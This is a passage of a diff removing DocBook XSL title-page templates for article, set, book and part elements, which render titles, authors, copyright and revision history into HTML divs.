- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/revision"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/revision"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="articleinfo/revhistory"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="artheader/revhistory"/>
- <xsl:apply-templates mode="article.titlepage.recto.auto.mode" select="info/revhistory"/>
-</xsl:template>
-
-<xsl:template name="article.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="article.titlepage.separator"><hr/>
-</xsl:template>
-
-<xsl:template name="article.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="article.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="article.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="article.titlepage.before.recto"/>
- <xsl:call-template name="article.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="article.titlepage.before.verso"/>
- <xsl:call-template name="article.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="article.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="article.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="article.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="abstract" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
- <xsl:call-template name="anchor"/>
- <xsl:apply-templates/>
-<!-- orignally generated content -->
-<!-- <xsl:apply-templates select="." mode="article.titlepage.recto.mode"/> -->
-</div>
-</xsl:template>
-
-<xsl:template match="title" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="article.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="article.titlepage.recto.style">
-<xsl:apply-templates select="." mode="article.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="set.titlepage.recto">
- <xsl:choose>
- <xsl:when test="setinfo/title">
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="setinfo/subtitle">
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/corpauthor"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/authorgroup"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/author"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/othercredit"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/releaseinfo"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/copyright"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/legalnotice"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/pubdate"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/revision"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/revhistory"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="setinfo/abstract"/>
- <xsl:apply-templates mode="set.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="set.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="set.titlepage.separator"><hr/>
-</xsl:template>
-
-<xsl:template name="set.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="set.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="set.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="set.titlepage.before.recto"/>
- <xsl:call-template name="set.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="set.titlepage.before.verso"/>
- <xsl:call-template name="set.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="set.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="set.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="set.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="set.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="set.titlepage.recto.style">
-<xsl:apply-templates select="." mode="set.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="book.titlepage.recto">
- <xsl:choose>
- <xsl:when test="bookinfo/title">
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/title"/>
- </xsl:when>
- <xsl:when test="info/title">
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/title"/>
- </xsl:when>
- <xsl:when test="title">
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="title"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:choose>
- <xsl:when test="bookinfo/subtitle">
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/corpauthor"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/authorgroup"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/author"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/othercredit"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/releaseinfo"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/copyright"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/legalnotice"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/pubdate"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/revision"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/revhistory"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="bookinfo/abstract"/>
- <xsl:apply-templates mode="book.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="book.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="book.titlepage.separator"><hr/>
-</xsl:template>
-
-<xsl:template name="book.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="book.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="book.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="book.titlepage.before.recto"/>
- <xsl:call-template name="book.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="book.titlepage.before.verso"/>
- <xsl:call-template name="book.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="book.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="book.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="book.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="title" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revision" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="revhistory" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="abstract" mode="book.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="book.titlepage.recto.style">
-<xsl:apply-templates select="." mode="book.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template name="part.titlepage.recto">
- <div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:call-template name="division.title">
-<xsl:with-param name="node" select="ancestor-or-self::part[1]"/>
-</xsl:call-template></div>
- <xsl:choose>
- <xsl:when test="partinfo/subtitle">
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="docinfo/subtitle">
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/subtitle"/>
- </xsl:when>
- <xsl:when test="info/subtitle">
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/subtitle"/>
- </xsl:when>
- <xsl:when test="subtitle">
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="subtitle"/>
- </xsl:when>
- </xsl:choose>
-
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/corpauthor"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/corpauthor"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/corpauthor"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/authorgroup"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/authorgroup"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/authorgroup"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/author"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/author"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/author"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/othercredit"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/othercredit"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/othercredit"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/releaseinfo"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/releaseinfo"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/releaseinfo"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/copyright"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/copyright"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/copyright"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/legalnotice"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/legalnotice"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/legalnotice"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/pubdate"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/pubdate"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/pubdate"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/revision"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/revision"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/revision"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/revhistory"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/revhistory"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/revhistory"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="partinfo/abstract"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="docinfo/abstract"/>
- <xsl:apply-templates mode="part.titlepage.recto.auto.mode" select="info/abstract"/>
-</xsl:template>
-
-<xsl:template name="part.titlepage.verso">
-</xsl:template>
-
-<xsl:template name="part.titlepage.separator">
-</xsl:template>
-
-<xsl:template name="part.titlepage.before.recto">
-</xsl:template>
-
-<xsl:template name="part.titlepage.before.verso">
-</xsl:template>
-
-<xsl:template name="part.titlepage">
- <div class="titlepage">
- <xsl:variable name="recto.content">
- <xsl:call-template name="part.titlepage.before.recto"/>
- <xsl:call-template name="part.titlepage.recto"/>
- </xsl:variable>
- <xsl:variable name="recto.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($recto.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($recto.content) != '') or ($recto.elements.count &gt; 0)">
- <div><xsl:copy-of select="$recto.content"/></div>
- </xsl:if>
- <xsl:variable name="verso.content">
- <xsl:call-template name="part.titlepage.before.verso"/>
- <xsl:call-template name="part.titlepage.verso"/>
- </xsl:variable>
- <xsl:variable name="verso.elements.count">
- <xsl:choose>
- <xsl:when test="function-available('exsl:node-set')"><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:when test="contains(system-property('xsl:vendor'), 'Apache Software Foundation')">
- <!--Xalan quirk--><xsl:value-of select="count(exsl:node-set($verso.content)/*)"/></xsl:when>
- <xsl:otherwise>1</xsl:otherwise>
- </xsl:choose>
- </xsl:variable>
- <xsl:if test="(normalize-space($verso.content) != '') or ($verso.elements.count &gt; 0)">
- <div><xsl:copy-of select="$verso.content"/></div>
- </xsl:if>
- <xsl:call-template name="part.titlepage.separator"/>
- </div>
-</xsl:template>
-
-<xsl:template match="*" mode="part.titlepage.recto.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="*" mode="part.titlepage.verso.mode">
- <!-- if an element isn't found in this mode, -->
- <!-- try the generic titlepage.mode -->
- <xsl:apply-templates select="." mode="titlepage.mode"/>
-</xsl:template>
-
-<xsl:template match="subtitle" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="corpauthor" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="authorgroup" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="author" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="othercredit" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="releaseinfo" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="copyright" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="legalnotice" mode="part.titlepage.recto.auto.mode">
-<div xsl:use-attribute-sets="part.titlepage.recto.style">
-<xsl:apply-templates select="." mode="part.titlepage.recto.mode"/>
-</div>
-</xsl:template>
-
-<xsl:template match="pubdate" mode="part.titlepage.recto.auto.mode">
